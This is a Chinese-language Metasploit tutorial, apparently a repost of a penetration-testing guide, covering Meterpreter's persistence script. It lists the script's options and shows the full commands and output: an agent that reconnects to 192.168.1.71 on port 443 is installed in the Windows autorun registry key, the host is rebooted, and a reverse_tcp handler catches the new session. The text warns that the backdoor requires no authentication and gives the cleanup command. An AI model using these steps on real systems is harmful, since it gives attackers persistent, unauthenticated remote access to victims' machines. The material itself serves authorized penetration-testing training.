Metasploit Meterpreter持久后門服務:persistence


原文:https://www.fujieace.com/metasploit/meterpreter-service.html

了解Metasploit Meterpreter

在經歷了exploit系統的所有艱苦工作之后,為自己留下更簡單的方法回到系統供以后使用通常是一個好主意。這樣,如果您最初exploit的服務已關閉或打補丁,您仍然可以訪問系統。Metasploit有一個Meterpreter腳本persistence.rb,它將創建一個Meterpreter服務,即使遠程系統重新啟動,您也可以使用該服務。

在我們繼續前進之前,有一個警告詞。此處顯示的持續Meterpreter不需要身份驗證。這意味着任何進入港口的人都可以進入后門!如果您正在進行滲透測試,這不是一件好事,因為這可能是一個重大風險。在真實世界的情況下,請務必謹慎行事,並確保在完成約定后自行清理。

Meterpreter

一旦我們最初exploit主機,我們使用'-h'開關運行持久性腳本來查看哪些選項可用:

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A   自動啟動一個匹配的exploit / multi / handler來連接到代理
    -L   如果未使用%TEMP%,則在目標主機中寫入有效負載的位置。
    -P   有效負載使用,默認為windows / meterpreter / reverse_tcp。
    -S   作為服務自動啟動代理程序(具有SYSTEM權限)
    -T   要使用的備用可執行模板
    -U   用戶登錄時自動啟動代理
    -X   系統引導時自動啟動代理程序
    -h   這個幫助菜單
    -i   每次連接嘗試之間的時間間隔(秒)
    -p   運行Metasploit的系統正在偵聽的端口
    -r   運行Metasploit監聽連接的系統的IP

我們將配置我們的持續Meterpreter會話,以等待用戶登錄到遠程系統,並嘗試每5秒鍾在端口443上的IP地址192.168.1.71連接回監聽器。

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.71
[*] Creating a persistent agent: LHOST=192.168.1.71 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613976 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\yyPSPPEn.vbs
[*] Agent executed with PID 492
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\YeYHdlEDygViABr
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/persistence/XEN-XP-SP2-BARE_20100821.2602/clean_up__20100821.2602.rc
meterpreter >
 

請注意,腳本輸出為您提供了在完成時刪除持久偵聽器的命令。請務必記下它,以免在系統上留下未經驗證的后門程序。要驗證它是否有效,我們重啟遠程系統並設置我們的payload handler程序。

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 3 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.71
LHOST => 192.168.1.71
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.71:443
[*] Starting the payload handler...
 

當用戶登錄到遠程系統時,為我們打開一個Meterpreter會話。

[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 5 opened (192.168.1.71:443 -> 192.168.1.161:1045) at 2010-08-21 12:31:42 -0600

meterpreter > sysinfo
Computer: XEN-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter >


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM